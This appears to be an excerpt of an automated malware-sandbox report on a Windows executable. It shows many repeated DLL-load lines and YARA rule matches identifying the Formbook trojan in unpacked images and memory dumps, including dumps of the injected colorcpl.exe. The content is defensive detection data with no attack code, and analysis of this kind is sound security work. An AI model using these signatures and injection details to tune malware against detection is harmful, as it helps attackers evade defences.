              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: Fpopgapwdcgvxn.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
